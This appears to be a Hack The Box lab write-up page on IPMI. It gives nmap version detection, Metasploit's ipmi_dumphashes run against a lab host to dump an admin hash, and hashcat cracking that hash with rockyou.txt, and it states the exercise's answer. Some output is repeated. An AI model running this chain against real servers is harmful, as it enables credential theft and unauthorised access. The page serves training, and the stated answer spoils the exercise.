 USER_FILE             /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt  yes       File containing usernames, one per line

[msf](Jobs:0 Agents:0) >> run
 [+] 10.129.116.226:623 - IPMI - Hash found: admin:86dd384c860c0000b5ee4700baccb1a7d2d2f08a83bbd0e624b7bfbd75a8218045a8dbc3c76b1e03a123456789abcdefa123456789abcdef140561646d696e:cd61b017e1dc796f8477ed49154af9485230abae
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed

What is the account's cleartext password?

root@htb:~$ sudo nmap -sU --script ipmi-version 10.129.116.226 -p 623
 PORT    STATE SERVICE
 623/udp open  asf-rmcp
 | ipmi-version: 
 |   Version: 
 |     IPMI-2.0
 |   UserAuth: password, md5, md2, null
 |   PassAuth: auth_msg, auth_user, non_null_user
 |_  Level: 1.5, 2.0

root@htb:~$ msfconsole
[msf](Jobs:0 Agents:0) >> search ipmi
    1   auxiliary/scanner/ipmi/ipmi_dumphashes   2013-06-20   normal  No     IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval
[msf](Jobs:0 Agents:0) >> use 1
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> show options
 PASS_FILE             /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes       File containing common passwords for offline cracking, one per line
 RHOSTS                                                                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
 RPORT                 623                                                    yes       The target port
 SESSION_MAX_ATTEMPTS  5                                                      yes       Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
 SESSION_RETRY_DELAY   5                                                      yes       Delay between session retries in seconds
 THREADS               1                                                      yes       The number of concurrent threads (max one per host)
 USER_FILE             /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt  yes       File containing usernames, one per line

[msf](Jobs:0 Agents:0) >> run
 [+] 10.129.116.226:623 - IPMI - Hash found: admin:86dd384c860c0000b5ee4700baccb1a7d2d2f08a83bbd0e624b7bfbd75a8218045a8dbc3c76b1e03a123456789abcdefa123456789abcdef140561646d696e:cd61b017e1dc796f8477ed49154af9485230abae
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed

root@htb:~$ nano ipmi.txt
 86dd384c860c0000b5ee4700baccb1a7d2d2f08a83bbd0e624b7bfbd75a8218045a8dbc3c76b1e03a123456789abcdefa123456789abcdef140561646d696e:cd61b017e1dc796f8477ed49154af9485230abae

root@htb:~$ hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
 ...

root@htb:~$ find / -name *rockyou* 2>/dev/null
 /usr/share/wordlists/rockyou.txt.gz
root@htb:~$ gunzip rockyou.txt.gz
root@htb:~$ ls
 rockyou.txt
root@htb:~$ hashcat -m 7300 ipmi.txt rockyou.txt
 ...
 Dictionary cache built:
 * Filename..: rockyou.txt
 * Passwords.: 14344392
 * Bytes.....: 139921507
 * Keyspace..: 14344385
 * Runtime...: 1 sec

 86dd384c860c0000b5ee4700baccb1a7d2d2f08a83bbd0e624b7bfbd75a8218045a8dbc3c76b1e03a123456789abcdefa123456789abcdef140561646d696e:cd61b017e1dc796f8477ed49154af9485230abae:trinity

PreviousNETWORK ENUMERATION W/ NMAP NextUSING THE METASPLOIT FRAMEWORK

Last updated 11 days ago